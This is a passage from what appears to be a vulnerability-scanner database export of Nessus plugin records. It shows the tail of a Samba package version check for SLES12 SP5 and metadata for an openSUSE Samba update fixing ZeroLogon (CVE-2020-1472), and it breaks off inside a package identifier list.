reference:\"samba-libs-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:08", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update project.", "cvss3": {}, "published": "2020-09-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : samba (openSUSE-2020-1513)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:samba-libs-python-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-pa